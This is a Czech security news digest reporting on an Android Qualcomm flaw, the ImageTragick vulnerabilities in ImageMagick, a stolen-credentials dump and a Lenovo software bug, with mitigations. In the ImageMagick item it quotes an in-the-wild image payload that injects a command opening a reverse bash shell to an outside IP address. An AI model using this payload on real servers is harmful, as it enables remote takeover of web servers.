SecUpdate: Tři čtvrtiny telefonů s Androidem je ohroženo krádeží soukromých dat
Velmi závažnou zranitelnost v softwarovém balíčku Qualcomm, který má na starosti tethering, nalezli výzkumníci ze společnosti Mandiant – FireEye. Zneužití této zranitelnosti pomocí škodlivé aplikace může útočníkovi umožnit přístup k soukromým datům uživatele.
Zranitelnost byla Qualcommu ohlášena v lednu a ten během března vydal opravu a rozeslal ji výrobcům zařízení, aby ji mohli distribuovat ke koncovým uživatelům. Podle blogu FireEye se zranitelnost týká zařízení se systémem Android 5.0 a starších. Jak je vidět na následujícím obrázku se statistikami, znamená to přibližně 73 % všech telefonů s OS Android.
Rozšířenost jednotlivých verzí systému Android
Pokud tedy máte starší verzi Androidu, buďte opatrní při stahování aplikací z marketu. Škodlivá aplikace je totiž cesta, jak může útočník tuto zranitelnost zneužít. Na starších zařízeních díky ní může extrahovat databázi s SMS zprávami a také historii hovorů, přistupovat na internet a provádět další operace, které má povolené uživatel „radio“. Na novějších zranitelných zařízeních, mezi která spadají ty s Androidem 4.4 a pozdějším, není hrozba tak vysoká. Útočník ale stále může měnit pokročilá systémová nastavení. V obou případech nemá zneužití žádný znatelný vliv na systém a oběť nemá šanci si povšimnout, že byla napadena.
Používáte Image Magick k úpravě obrázků? Pozor na jeho zranitelnosti!
V minulém týdnu se řada zranitelností s vlastním názvem, logem a webovou stránkou rozšířila o další přírůstek. Tentokrát se jednalo o zranitelnosti v sadě nástrojů pro zobrazování, konverzi a editaci obrázků ImageMagick. Chyba byla odhalována postupně, prvotní známky zranitelností odhalil hacker Stewie a další problémy, včetně možnosti vzdáleného spuštění kódu, nalezl Nikolay Ermishkin z bezpečnostního týmu Mail.ru. Za zveřejněním chyb a názvem ImageTragick ale podle webu zranitelnosti stojí někdo jiný než její nálezci. Spolu s tímto webem byl také zveřejněn PoC kód na Githubu.
Logo zranitelnosti ImageTragick
Jak už bylo zmíněno, jedna ze zranitelností, CVE-2016-3714, umožňovala vzdálené spuštění kódu. To mohlo vést ke kompromitaci webových stránek nebo k převzetí správy nad webovým serverem. A podle aktuálních zpráv od společnosti Sucuri se exploit využívající právě tuto zranitelnost již šíří internetem. Její výzkumníci objevili bota, který skenuje webové stránky a hledá na nich URL na kterých dochází k uploadu obrázků (/upload.php a /imgupload.php). Na ty pak odesílá speciálně vytvořený JPG soubor se škodlivým obsahem, který mu otevře cestu k webovému serveru. Jak je vidět, škodlivý kód v JPEG souboru není komplikovaný.
push graphic-context
viewbox 0 0 640 480 fill 'url(https://\x22|setsid /bin/bash -i >/dev/tcp/106.186.30.7/443 0<&1 2>&1")'
Další čtyři ohlášené zranitelnosti jsou:
- CVE-2016-3715 umožňuje vzdálené smazání souborů ze serveru pomocí využití protokolu
ephemeral:/
, který je součástí ImageMagick - CVE-2016-3716 umožňuje vzdálené přesouvání souborů na serveru pomocí využití protokolu
msl:/
- CVE-2016-3717 umožňuje čtení obsahu souborů pomocí protokolu
label:@
- CVE-2016-3718 spočívá ve falšování požadavků na serveru. Pomocí speciálně upraveného souboru může útočník přimět server k připojení ke škodlivé doméně pomocí http nebo FTP
A jak se bránit? Autoři nástroje ImageMagick již vydali verzi 7.0.1-1 s opravou, kterou můžete najít na jejich webu. Další možností je před zpracováním nahraných obrázků ověřit, zda začínají tzv. magickými byty, které odpovídají typu souboru a tím zjistit, že se skutečně jedná o obrázky a ne exploity. Jak mají byty vypadat, zjistíte například na Wikipedii. Dále je také vhodné upravit na serveru soubor /etc/ImageMagick/policy.xml podle rad na diskuzním fóru ImageMagick.
Google převedl všechny blogy na doméně blogspot na HTTPS
Google oznámil rozšíření základů internetové bezpečnosti používáním HTTPS protokolu pro všechny blogy na doméně blogspot. To bylo již možné od září minulého roku, HTTPS variantu ale bylo nutné zapnout v nastavení. Právě tuto volbu nyní Google z nastavení odstranil a nové budou přístupné přes HTTPS i ty blogy, u kterých dříve nebyl zabezpečený protokol používán.
Indikace přístupu přes HTTPS v prohlížeči Chrome
Místo toho ale v nastavení správci blogů najdou novou možnost, pojmenovanou HTTPS přesměrování. Pokud tuto volbu zapnete, budou všichni návštěvníci blogu, kteří přistoupili na HTTP verzi, automaticky přesměrování na zabezpečenou variantu. V případě, že ponecháte volbu vypnutou, mají návštěvníci možnost si zvolit, zda použijí zabezpečené či nezabezpečené spojení.
Nová možnost vynuceného přesměrování na HTTPS v nastavení blogu
Ve spojení s vynuceným přesměrování Google upozorňuje na možný vznik problémů s tzv. smíšeným obsahem. Jedná se o různé části příspěvků na blogu - obrázky, skripty a podobně, které jsou načítány přes HTTP i přesto, že je na blog přistupováno pomocí HTTPS. Takové zdroje nemusí být korektně načteny a mohou způsobit problémy. Pro jejich snadnější odhalení Google dává k dispozici nástroj, který by je měl odhalit a pomoci problémy automaticky opravit.
272 miliónů ukradených přihlašovacích údajů za necelý dolar na ruském fóru
Společnost Hold Security, která se specializuje na datové úniky, objevila na ruském diskuzním fóru hackera, který se chlubil odcizením 1,17 miliard přihlašovacích údajů. Nakonec se po odstranění duplicit a chyb ukázalo, že jde „jen“ o 272 miliónů účtů, ale i tak se jedná o číslo, které nemůže být z jednoho úniku a data byla pravděpodobně seskládána z několika různých útoků. Zajímavý je také fakt, že hacker nabízel data k prodeji za 50 rublů, což je necelý jeden dolar.
Reuters balík dat rozebrala a ukázalo se, že obsahuje 57 miliónů účtů z mail.ru. Dále 40 miliónů účtů z Yahoo, 33 miliónů z Hotmailu od Microsoftu a 24 miliónů účtů Gmailu. V tisících se mezi daty objevovali kombinace uživatelských jmena hesel zaměstnanců velkých amerických bank a dalších obchodních společností.
Poměrně velká část účtů již byla v rámci nějakého úniku nalezena, ale i přesto balík obsahoval hodně čerstvých dat. Konkrétně 42,5 milionu účtů, které se doposud nikde jinde neobjevily. Pokud tedy používáte některou ze zmíněných služeb, bylo by pro jistotu vhodně změnit heslo a případně zkontrolovat historii přihlášení, jestli jste opravdu jediní, kdo váš účet využívá.
Lenovo Solution Center obsahovalo zranitelnost zneužitelnou po lokální síti
Opět se objevila zranitelnost u společnosti Lenovo, která už dříve čelila problémům s tím, že její předinstalovaný software ohrožuje bezpečnost uživatelů. Tentokrát se jednalo o Lenovo Solution Center, program, který je přeinstalovaný na mnoha noteboocích a stolních PC a má uživatelům sloužit ke kontrole systémových informací, správě updatů a záloh, provádění HW testů a podobně. Program se skládá ze dvou komponent, z grafického rozhraní a služby LSCTaskService, která neustále běží na pozadí.
Lenovo Solution Center - uživatelské rozhraní
Právě zmíněná služba obsahovala zranitelnost, která umožňovala lokálnímu uživateli spustit libovolný kód se systémovým oprávněním. Mimo to existovala také CSRF zranitelnost, která umožňovala využití vzdálené využití chyby tím, že uživatel navštívil škodlivou stránku v době, kdy služba běžela na pozadí. Pokud si říkáte, že Solution Center nepoužíváte, takže váš počítač nebyl ohrožen, opak je pravdou. K provedení útoku je potřeba pouze spuštěná služba, která se pouští automaticky, grafické rozhraní uživatel vůbec spouštět nemusí a přesto je zranitelný. Oprava problému je v poslední verzi programu, která je ke stažení na stránkách společnosti Lenovo.
Další zprávy ze světa IT bezpečnosti v bodech:
- Přístupný a modifikovatelný nástroj pro útoky - to je Lost Door RAT
- Microsoft bude od léta považovat SHA-1 za zastaralý
- OpenSSL opravilo dvě vážné a čtyři méně závažné zranitelnosti
- Chytré pomůcky do domácnosti od Samsungu mohou být zneužity útočníky [PDF]
- Ze služby Pwnedlist mohl někdo získat miliony přístupových údajů
- Nejmladší hacker světa ve svých 10 letech dostal odměnu od Facebooku
- Plugin pro WordPress bbPress obsahoval XSS zranitelnost
- Apple vypustil novou verzi vývojového prostředí Xcode
- Tvůrci CyptMix ransomwaru slibují posílat část z výkupného charitě